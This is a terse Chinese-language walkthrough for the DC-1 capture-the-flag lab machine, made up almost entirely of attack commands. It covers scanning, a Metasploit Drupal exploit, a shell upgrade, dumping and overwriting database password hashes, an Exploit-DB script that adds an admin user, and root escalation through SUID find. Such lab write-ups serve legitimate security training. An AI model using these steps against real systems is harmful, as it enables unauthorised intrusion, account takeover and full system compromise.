DC-1
@[toc]
1.扫描
· 扫描端口
nmap -A 192.168.88.130 -p-
· 扫描目录
dirb 192.168.88.130
#未扫出有用目录
· 扫描漏洞
msfconsole
search drupal
use 1
2.利用漏洞
可以使用反弹shell
shell
python -c "import pty;pty.spawn('/bin/bash')"
3.翻文件
- 可省略,直接进入4.提权
- flag1
- flag4
在数据库添加用户
find . -name "set*"
drupaldb
dbuser:R0ck3t
翻数据库
mysql -udbuser -pR0ck3t
show database;
use drupaldb;
show tables;
select * from users\G;#加\G将查到的结构旋转90度
admin:$S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
Fred:$S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg
- hash加密,寻找加密文件
find . -name "*hash*"
123456:$S$DCfm4ArOmrzZa6jSdVvOCJnex9vF4L32nsccVFZVpSTWPMBIcf7w
- 修改数据库admin密码
update users set pass='$S$DCfm4ArOmrzZa6jSdVvOCJnex9vF4L32nsccVFZVpSTWPMBIcf7w'where name="admin";
直接调用漏洞添加用户
也可直接通过以下漏洞添加用户
searchsploit drupal
searchsploit -m 34992.py
python2 34992.py -t http://192.168.88.134 -u 123456 -p 123456
添加一个用户名123456密码123456的用户来登录(存在admin用户,无法添加)
登录进网页
4.提权
查看所用文件
find / -perm -u=s -type f 2>/dev/null
- find提权
find / -exec "/bin/bash" -p \;
